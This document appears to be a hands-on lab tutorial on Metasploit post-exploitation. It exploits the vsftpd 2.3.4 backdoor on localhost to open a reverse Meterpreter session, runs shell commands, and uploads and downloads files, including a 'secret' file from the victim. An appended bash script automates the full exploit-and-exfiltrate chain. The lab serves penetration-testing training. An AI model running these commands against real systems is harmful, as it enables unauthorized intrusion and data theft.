Metasploit Basic Post-Exploitation


Introduction

In this lab, you will learn the fundamentals of post-exploitation using the Metasploit Framework. First, you will gain initial access by exploiting a vulnerable FTP server to establish a Meterpreter session. Then you will move into the post-exploitation phase. In an engagement this phase covers exploring the compromised system, escalating privileges, and exfiltrating data; this lab exercises the first and the last of these.

You will practice essential Meterpreter commands to interact with a session, execute shell commands, and transfer files between the attacker and victim machines. This lab will guide you from the initial exploit to basic post-exploitation techniques.

Gain Initial Access

In this step, you will gain access to the target system by exploiting the backdoor in the VSFTPD 2.3.4 service: a trojaned release of vsftpd that opens a command shell on TCP port 6200 when an FTP username containing ":)" is sent. Metasploit uses that shell to deliver a payload, giving you a Meterpreter session for post-exploitation.

First, launch the Metasploit Framework console.

msfconsole -q

Once Metasploit is running, select the exploit for the VSFTPD 2.3.4 backdoor.

use exploit/unix/ftp/vsftpd_234_backdoor

Now, configure the target and payload options. Since the service is running on the same machine, we use the loopback address for both RHOSTS (the target) and LHOST (the address the reverse Meterpreter payload connects back to). The default payload requires LHOST, and payload encoding may fail with "All encoders failed to encode"; setting the encoder to generic/none skips encoding entirely:

set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none

Finally, launch the exploit.

exploit

TROUBLESHOOTING: If you see Msf::OptionValidateError One or more options failed to validate: LHOST, run set LHOST 127.0.0.1. If you see All encoders failed to encode, run set Encoder generic/none. Then run exploit again.

WARNING: The first attempt might fail with "Unable to connect to backdoor on 6200/TCP. Cooldown?" or "Exploit completed, but no session was created." If this happens, run the exploit command again; the second attempt should succeed.

If successful, a Meterpreter session will be opened (session 1).

[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >

You now have a Meterpreter session. To return to the msf > prompt for the next step, press Ctrl+Z and answer y when asked "Background session 1?" (typing background at the meterpreter > prompt does the same). Backgrounding keeps the session alive; exit would close it.

Interact with Meterpreter Session

Now that you have a Meterpreter session in the background, you will learn how to interact with it. The sessions command lists all active sessions and is run from the main Metasploit prompt (msf exploit(...) >), which is why you backgrounded the session first.

To see your active sessions, run:

sessions

You should see your Meterpreter session with ID 1.

Active sessions
===============

  Id  Name  Type                    Information  Connection
  --  ----  ----                    -----------  ----------
  1         meterpreter x86/linux                127.0.0.1:4444 -> 127.0.0.1:xxxxx (127.0.0.1)

To interact with session 1, run:

sessions -i 1

Your prompt will change to meterpreter >, indicating you are now inside the session.

[*] Starting interaction with 1...

meterpreter >

You are now ready to run post-exploitation commands from within Meterpreter.

Run Shell Commands with the shell Command

From within Meterpreter, you can drop into a standard system shell to run commands on the target. This is useful when you need to execute shell-specific commands or scripts.

At the meterpreter > prompt, type:

shell

A standard shell opens on the remote target. It prints no prompt, so the console may look as if it has hung; it is simply waiting for input, and you can run commands directly.

Process 1654 created.
Channel 1 created.

Run whoami to confirm your user context. Everything you do from this shell runs with this user's privileges, because the shell inherits them from the exploited vsftpd process:

whoami
labex

Type exit to return to the Meterpreter prompt.

exit

Your prompt will change back to meterpreter >. In the next step, you will use this session to upload a file to the target.

Upload File with upload /local/path /remote/path

Meterpreter's upload command transfers files from your local machine to the target. A file named local_file.txt is in /home/labex/project. Upload it to /tmp on the remote machine.

From the meterpreter > prompt, run:

upload /home/labex/project/local_file.txt /tmp/uploaded_file.txt

You will see output confirming the upload:

[*] Uploading  : /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt
[*] Uploaded -1.00 B of 48.00 B (-2.08%): /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt
[*] Completed  : /home/labex/project/local_file.txt -> /tmp/uploaded_file.txt

In this lab the target runs on the same machine, so the file appears at /tmp/uploaded_file.txt. On a real target you would confirm the upload from the session itself, for example with Meterpreter's ls and cat commands or from the shell you used in the previous step. Next, you will practice the reverse operation: downloading a file from the target.

Download File with download /remote/path /local/path

The download command transfers files from the target to your local machine. A file named secret_data.txt is in /tmp on the remote system. Download it to your project directory.

From the meterpreter > prompt, run:

download /tmp/secret_data.txt /home/labex/project/downloaded_secret.txt

You will see output confirming the download. Note the destination path in the output: Meterpreter may create a directory named downloaded_secret.txt and place the file inside it as secret_data.txt, so the Completed line tells you where the file actually landed.

[*] Downloading: /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt
[*] Downloaded 47.00 B of 47.00 B (100.0%): /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt
[*] Completed  : /tmp/secret_data.txt -> /home/labex/project/downloaded_secret.txt/secret_data.txt

The file is now on your local machine. In the final step, you will close the session and verify the downloaded content.

Exit Session with exit Command

In this final step, you will close the Meterpreter session and exit the Metasploit console.

From the meterpreter > prompt, type exit to close the session.

exit
[*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died

To exit the Metasploit console, type exit. If prompted about an active session, use exit -y to force exit.

exit -y

Verify the downloaded file. As noted earlier, Meterpreter may have created a directory; the file is at downloaded_secret.txt/secret_data.txt:

cat /home/labex/project/downloaded_secret.txt/secret_data.txt
This is a secret file from the victim machine.

Congratulations! You have completed a full exploit and post-exploitation workflow.
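The whole workflow above, driven from a resource script instead of typed by hand, as an added example that is not part of the lab's own material: a bash wrapper writes an msfconsole resource file that sets the options, uses a <ruby> block (with msfconsole's run_single and framework helpers) to retry exploit -z until a session exists, which covers the failed first attempt the warning describes, runs the upload and download through sessions -C, and then checks the result. The sha256 of the uploaded file as computed on the target (via sessions -c) is compared against the local copy, and the downloaded file is located whether or not Meterpreter created the directory described in the download step. The lab paths are the page's; the resource and log file names, the retry count and the RUN_MSF_LAB switch are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not part of the lab): drive the exploit -> upload -> download
# workflow from an msfconsole resource script and verify both transfers.
# The lab paths are taken from the page; the .rc/.log file names, the retry
# count and the RUN_MSF_LAB switch are assumptions.
set -u

RHOST="127.0.0.1"
LOCAL_FILE="/home/labex/project/local_file.txt"
REMOTE_UPLOAD="/tmp/uploaded_file.txt"
REMOTE_SECRET="/tmp/secret_data.txt"
LOCAL_DOWNLOAD="/home/labex/project/downloaded_secret.txt"

# Write the resource script. The <ruby> block uses msfconsole's run_single and
# framework helpers to retry 'exploit -z' (open the session, do not interact)
# until a session exists, which covers the "Cooldown?" / "no session was
# created" failure the lab warns about on the first attempt.
write_rc() {
  local rc="$1"
  cat > "$rc" <<EOF
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $RHOST
set LHOST $RHOST
set Encoder generic/none
<ruby>
3.times do |attempt|
  run_single("exploit -z")
  break unless framework.sessions.empty?
  print_status("No session after attempt #{attempt + 1}, retrying in 5s")
  sleep 5
end
</ruby>
sessions -l
sessions -C "upload $LOCAL_FILE $REMOTE_UPLOAD"
sessions -c "sha256sum $REMOTE_UPLOAD"
sessions -C "download $REMOTE_SECRET $LOCAL_DOWNLOAD"
sessions -K
exit -y
EOF
}

# Meterpreter's download may create a directory named after the destination
# and put the file inside it. Print whichever path actually holds the file.
resolve_download() {
  local dest="$1" name="$2"
  if [ -f "$dest" ]; then
    printf '%s\n' "$dest"
  elif [ -f "$dest/$name" ]; then
    printf '%s\n' "$dest/$name"
  else
    return 1
  fi
}

# Extract the digest that 'sessions -c "sha256sum <path>"' printed into the
# console log (the line is raw command output: "<64 hex>  <path>").
hash_from_log() {
  local log="$1" path="$2"
  grep -Eo "[0-9a-f]{64}[[:space:]]+$path" "$log" | head -n 1 | awk '{print $1}'
}

run_lab() {
  local rc="/tmp/lab_post.rc" log="/tmp/lab_post.log"
  local local_hash remote_hash got
  write_rc "$rc"
  msfconsole -q -r "$rc" 2>&1 | tee "$log"

  # Upload integrity: the digest computed on the target must match our copy.
  local_hash=$(sha256sum "$LOCAL_FILE" | awk '{print $1}')
  remote_hash=$(hash_from_log "$log" "$REMOTE_UPLOAD")
  if [ -z "$remote_hash" ] || [ "$local_hash" != "$remote_hash" ]; then
    echo "upload check failed: local=$local_hash remote=${remote_hash:-none}" >&2
    return 1
  fi
  echo "upload verified: $REMOTE_UPLOAD sha256=$remote_hash"

  # Download: locate the file wherever Meterpreter put it and show it.
  if ! got=$(resolve_download "$LOCAL_DOWNLOAD" "$(basename "$REMOTE_SECRET")"); then
    echo "download not found under $LOCAL_DOWNLOAD" >&2
    return 1
  fi
  echo "downloaded file: $got"
  cat "$got"
}

# Only drive msfconsole when explicitly asked; the helpers above can be
# exercised on their own (RUN_MSF_LAB=1 ./post_lab.sh).
if [ "${RUN_MSF_LAB:-0}" = "1" ]; then
  run_lab
fi
```

Run it with RUN_MSF_LAB=1 on the lab machine. The hash comparison is the check worth keeping in your own tooling: the Uploaded/Completed lines only say that Meterpreter finished writing, while a digest computed on the target proves the bytes that arrived are the bytes you sent.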

Summary

In this lab, you have learned a complete workflow from initial access to post-exploitation. You started by gaining a Meterpreter session via an exploit. You practiced how to list and interact with sessions, drop from Meterpreter into a standard system shell, and transfer files between the attacker and victim machines with the upload and download commands. Finally, you learned how to properly close a session and exit the Metasploit console. These skills are fundamental to penetration testing.